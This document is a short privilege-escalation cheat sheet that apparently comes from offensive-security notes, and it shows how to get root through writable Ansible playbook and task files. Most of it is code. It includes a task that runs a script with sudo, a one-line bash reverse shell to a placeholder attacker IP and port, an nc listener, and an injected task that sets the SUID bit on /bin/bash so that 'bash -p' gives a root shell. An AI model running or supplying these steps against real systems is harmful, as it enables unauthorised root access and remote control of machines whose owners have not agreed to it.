# Ansible Playbook Privilege Escalation

### PrivEsc with Tasks <a href="#privesc-with-tasks" id="privesc-with-tasks"></a>

First off, check the content of playbook in **`/opt/ansible/playbooks`**.\
For instance, a file named **“httpd.yaml”**.

```shellscript
- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...
```

Next, check the content of configure files in **`/opt/ansible/roles/geerlingguy.apache/tasks`**.\
And add the exploitable file in this.\
For example, a file named **`“shell.yml”`**.

```shellscript
- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
```

Create a exploit for reverse shell.

```
echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
```

Then open a listener in local machine.

```
nc -lvnp <local-port>
```

At the end, execute **“ansible”**

```shellscript
ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible
```

### PrivEsc with Automation Task <a href="#privesc-with-automation-task" id="privesc-with-automation-task"></a>

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (**`tasks/`**), we can inject arbitrary commands in **yaml** file.\
For example, create a new file **`/opt/ansible/tasks/evil.yaml`**.

```shellscript
- hosts: localhost
    tasks:
      - name: Evil
        ansible.builtin.shell: |
          chmod +s /bin/bash
        become: true
```

After a while, we can escalate the root privilege by executing the following command.

```
/bin/bash -p

```